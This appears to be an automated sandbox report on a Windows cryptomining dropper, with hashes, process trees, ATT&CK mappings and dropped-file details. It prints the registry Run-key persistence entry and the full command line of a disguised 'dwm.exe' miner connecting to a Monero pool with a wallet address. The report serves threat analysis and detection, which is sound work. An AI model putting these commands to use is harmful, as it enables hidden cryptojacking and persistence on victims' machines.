8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966

Analysis

max time kernel
150s
max time network
64s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
24-11-2022 00:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe
Size

4.9MB
MD5

f7943a827363ab4417b44a5f5a34d84b
SHA1

fb526dce59670014f3d494c451fe87398b27d2bb
SHA256

8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966
SHA512

7d4b1ad14f7a07178dd623b8cc11707c4032279e6b735b11130e1dd34b508082836c920e144c191ebb1c8574122af40b3e29a519d69a6027e220d25db6e1c19d
SSDEEP

98304:AZ4FLxsKhGwrB46QdU0OfAiogNh78zVcnsisWHgpj2aiSgb1tt5:Qy13G246Qa0S3oKZ+cYWoj2vS611

Score

8^/10

persistence vmprotect

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

key.exedwm.exe

pid process

1768 key.exe
860 dwm.exe

pid	process
1768	key.exe
860	dwm.exe

VMProtect packed file 6 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe	vmprotect
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe	vmprotect
behavioral1/memory/860-77-0x000000013F1F0000-0x000000013F59D000-memory.dmp	vmprotect
behavioral1/memory/860-82-0x000000013F1F0000-0x000000013F59D000-memory.dmp	vmprotect

Loads dropped DLL 10 IoCs

Processes:

8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exerundll32.exe

pid	process
1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe
1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe
1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe
1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1936

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

key.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\	key.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\tsiVideo = "C:\\Windows\\SysWOW64\\rundll32.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\\\mdi064.dll,asdasd"	key.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

dwm.exe

pid process

860 dwm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
860	dwm.exe

Suspicious behavior: EnumeratesProcesses 63 IoCs

Processes:

rundll32.exe

pid	process
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe
1292	rundll32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

dwm.exe

description pid process

Token: SeLockMemoryPrivilege 860 dwm.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

rundll32.exe

pid process

1292 rundll32.exe
1292 rundll32.exe

description	pid	process
Token: SeLockMemoryPrivilege	860	dwm.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exekey.exerundll32.exe

description	pid	process	target process
PID 1436 wrote to memory of 1768	1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe	key.exe
PID 1436 wrote to memory of 1768	1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe	key.exe
PID 1436 wrote to memory of 1768	1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe	key.exe
PID 1436 wrote to memory of 1768	1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe	key.exe
PID 1436 wrote to memory of 1768	1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe	key.exe
PID 1436 wrote to memory of 1768	1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe	key.exe
PID 1436 wrote to memory of 1768	1436	8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe	key.exe
PID 1768 wrote to memory of 1292	1768	key.exe	rundll32.exe
PID 1768 wrote to memory of 1292	1768	key.exe	rundll32.exe
PID 1768 wrote to memory of 1292	1768	key.exe	rundll32.exe
PID 1768 wrote to memory of 1292	1768	key.exe	rundll32.exe
PID 1768 wrote to memory of 1292	1768	key.exe	rundll32.exe
PID 1768 wrote to memory of 1292	1768	key.exe	rundll32.exe
PID 1768 wrote to memory of 1292	1768	key.exe	rundll32.exe
PID 1292 wrote to memory of 860	1292	rundll32.exe	dwm.exe
PID 1292 wrote to memory of 860	1292	rundll32.exe	dwm.exe
PID 1292 wrote to memory of 860	1292	rundll32.exe	dwm.exe
PID 1292 wrote to memory of 860	1292	rundll32.exe	dwm.exe

C:\Users\Admin\AppData\Local\Temp\8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe
"C:\Users\Admin\AppData\Local\Temp\8271b0053bcb990e4635ff9adb11bd55d1b03daf69c710c0fb6b2c0435f84966.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1436

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\\mdi064.dll,asdasd
3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1292

C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.2
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:860

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ert.gif
Filesize
4.7MB

MD5
16bd647d1f0e029b9f8ba4557aa368c1

SHA1
3d18e6a0affb43e99e7f1d6707abb93b22debdff

SHA256
d158b641f03d8f7c58e8c86215c8a70bcf2cdb68e93a7ffce6f7c9343191d025

SHA512
7b7916b693ee7975fc55e746b0fb0103105d63f1d5ee274076cbbed4ae34e728031a1b491277d8d4bfde12586fbf18d20befe6a405e48fd5574ec3c5a3c3ab63

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
Filesize
76KB

MD5
e47913ed7e4f97cd7c5f487fc66c076f

SHA1
e050020848975eb6a0c78b1bb24b872493446880

SHA256
51067f2d6857e40196b6f80ccba1a1e236983bfc3e6a59408f83a18d01ec36bb

SHA512
725bc34d41df5d2854c4610d021ad9c71a709e7bc958618e8dc5df31170fd7eaf05584197f1fb2a9a61dfbfa26adace32f1cc7938fd4f9c8b30fcbee369c57f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\mdi064.dll
Filesize
4.6MB

MD5
f42201e1867d4b345373296577d40035

SHA1
b691363aa20b1d7681c7557a6aa40f3596416555

SHA256
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea

SHA512
4fac587eaa45e085b210b55164f928493af98911addc429772e5a45d5b205635ff846264a07e529a5d13d20f0b7ac2042139f44a036c3a2dae6f933f307461e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
Filesize
1.5MB

MD5
eedb9d86ae8abc65fa7ac7c6323d4e8f

SHA1
ce1fbf382e89146ea5a22ae551b68198c45f40e4

SHA256
d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078

SHA512
9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
Filesize
1.5MB

MD5
eedb9d86ae8abc65fa7ac7c6323d4e8f

SHA1
ce1fbf382e89146ea5a22ae551b68198c45f40e4

SHA256
d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078

SHA512
9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
Filesize
76KB

MD5
e47913ed7e4f97cd7c5f487fc66c076f

SHA1
e050020848975eb6a0c78b1bb24b872493446880

SHA256
51067f2d6857e40196b6f80ccba1a1e236983bfc3e6a59408f83a18d01ec36bb

SHA512
725bc34d41df5d2854c4610d021ad9c71a709e7bc958618e8dc5df31170fd7eaf05584197f1fb2a9a61dfbfa26adace32f1cc7938fd4f9c8b30fcbee369c57f9

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
Filesize
76KB

MD5
e47913ed7e4f97cd7c5f487fc66c076f

SHA1
e050020848975eb6a0c78b1bb24b872493446880

SHA256
51067f2d6857e40196b6f80ccba1a1e236983bfc3e6a59408f83a18d01ec36bb

SHA512
725bc34d41df5d2854c4610d021ad9c71a709e7bc958618e8dc5df31170fd7eaf05584197f1fb2a9a61dfbfa26adace32f1cc7938fd4f9c8b30fcbee369c57f9

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
Filesize
76KB

MD5
e47913ed7e4f97cd7c5f487fc66c076f

SHA1
e050020848975eb6a0c78b1bb24b872493446880

SHA256
51067f2d6857e40196b6f80ccba1a1e236983bfc3e6a59408f83a18d01ec36bb

SHA512
725bc34d41df5d2854c4610d021ad9c71a709e7bc958618e8dc5df31170fd7eaf05584197f1fb2a9a61dfbfa26adace32f1cc7938fd4f9c8b30fcbee369c57f9

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
Filesize
76KB

MD5
e47913ed7e4f97cd7c5f487fc66c076f

SHA1
e050020848975eb6a0c78b1bb24b872493446880

SHA256
51067f2d6857e40196b6f80ccba1a1e236983bfc3e6a59408f83a18d01ec36bb

SHA512
725bc34d41df5d2854c4610d021ad9c71a709e7bc958618e8dc5df31170fd7eaf05584197f1fb2a9a61dfbfa26adace32f1cc7938fd4f9c8b30fcbee369c57f9

Download Submit
\Users\Admin\AppData\Local\Temp\mdi064.dll
Filesize
4.6MB

MD5
f42201e1867d4b345373296577d40035

SHA1
b691363aa20b1d7681c7557a6aa40f3596416555

SHA256
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea

SHA512
4fac587eaa45e085b210b55164f928493af98911addc429772e5a45d5b205635ff846264a07e529a5d13d20f0b7ac2042139f44a036c3a2dae6f933f307461e6

Download Submit
\Users\Admin\AppData\Local\Temp\mdi064.dll
Filesize
4.6MB

MD5
f42201e1867d4b345373296577d40035

SHA1
b691363aa20b1d7681c7557a6aa40f3596416555

SHA256
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea

SHA512
4fac587eaa45e085b210b55164f928493af98911addc429772e5a45d5b205635ff846264a07e529a5d13d20f0b7ac2042139f44a036c3a2dae6f933f307461e6

Download Submit
\Users\Admin\AppData\Local\Temp\mdi064.dll
Filesize
4.6MB

MD5
f42201e1867d4b345373296577d40035

SHA1
b691363aa20b1d7681c7557a6aa40f3596416555

SHA256
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea

SHA512
4fac587eaa45e085b210b55164f928493af98911addc429772e5a45d5b205635ff846264a07e529a5d13d20f0b7ac2042139f44a036c3a2dae6f933f307461e6

Download Submit
\Users\Admin\AppData\Local\Temp\mdi064.dll
Filesize
4.6MB

MD5
f42201e1867d4b345373296577d40035

SHA1
b691363aa20b1d7681c7557a6aa40f3596416555

SHA256
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea

SHA512
4fac587eaa45e085b210b55164f928493af98911addc429772e5a45d5b205635ff846264a07e529a5d13d20f0b7ac2042139f44a036c3a2dae6f933f307461e6

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
Filesize
1.5MB

MD5
eedb9d86ae8abc65fa7ac7c6323d4e8f

SHA1
ce1fbf382e89146ea5a22ae551b68198c45f40e4

SHA256
d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078

SHA512
9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
Filesize
1.5MB

MD5
eedb9d86ae8abc65fa7ac7c6323d4e8f

SHA1
ce1fbf382e89146ea5a22ae551b68198c45f40e4

SHA256
d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078

SHA512
9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5

Download Submit
memory/860-73-0x0000000000000000-mapping.dmp

Download
memory/860-77-0x000000013F1F0000-0x000000013F59D000-memory.dmp

Filesize
3.7MB

Download
memory/860-82-0x000000013F1F0000-0x000000013F59D000-memory.dmp

Filesize
3.7MB

Download
memory/1292-64-0x0000000000000000-mapping.dmp

Download
memory/1292-78-0x00000000024D0000-0x000000000287D000-memory.dmp

Filesize
3.7MB

Download
memory/1292-81-0x00000000024D0000-0x000000000287D000-memory.dmp

Filesize
3.7MB

Download
memory/1436-54-0x0000000075711000-0x0000000075713000-memory.dmp

Filesize
8KB

Download
memory/1768-66-0x0000000002C30000-0x0000000003125000-memory.dmp

Filesize
5.0MB

Download
memory/1768-63-0x0000000002C30000-0x0000000003125000-memory.dmp

Filesize
5.0MB

Download
memory/1768-59-0x0000000000000000-mapping.dmp

Download